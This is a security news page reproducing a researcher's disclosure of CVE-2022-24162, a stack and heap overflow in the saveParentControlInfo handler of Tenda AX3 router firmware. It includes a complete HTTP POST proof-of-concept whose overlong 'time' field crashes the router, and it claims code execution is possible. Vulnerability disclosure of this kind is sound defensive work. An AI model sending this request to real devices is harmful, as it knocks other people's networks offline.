Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-24162: my_vuln/27.md at main · pjqwudi/my_vuln

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function saveParentControlInfo. This vulnerability allows attackers to cause a Denial of Service (DoS) via the time parameter.

CVE
#vulnerability#ubuntu#linux#dos#git

Tenda Vulnerability

Vendor:Tenda

Product:AX3

Version:V16.03.12.10_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)

Type:Stack Overflow & Heap Overflow

Author:Jiaqian Peng

Institution:[email protected]

Vulnerability description

We found an stack overflow & heap overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

Stack Overflow & Heap Overflow

In httpd binary:

In saveParentControlInfo function, time is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the time to execute arbitrary code.

As you can see here, the input has not been checked. In compare_parentcontrol_time function, the parameter time is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.

Supplement

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

There is also a heap overflow vulnerability in the function get_parentControl_list_Info.

There are many overflow vulnerabilities inside this function

PoC

We set time as 19%3A00-aaaaaaaaaaaaaaaaaaaaaaaaaaaa… , and the router will crash, such as:

POST /goform/saveParentControlInfo HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 273 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/parental_control.html?random=0.12030911103673769& Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0ibccvb

deviceId=00%3A0c%3A29%3A32%3Aa0%3A89&deviceName=pjquwdi&enable=1&time=19%3A00-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&url_enable=1&urls=www.baidu.com&day=1%2C1%2C1%2C1%2C1%2C1%2C1&limit_type=0

Result

The target router crashes and cannot provide services correctly and persistently.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907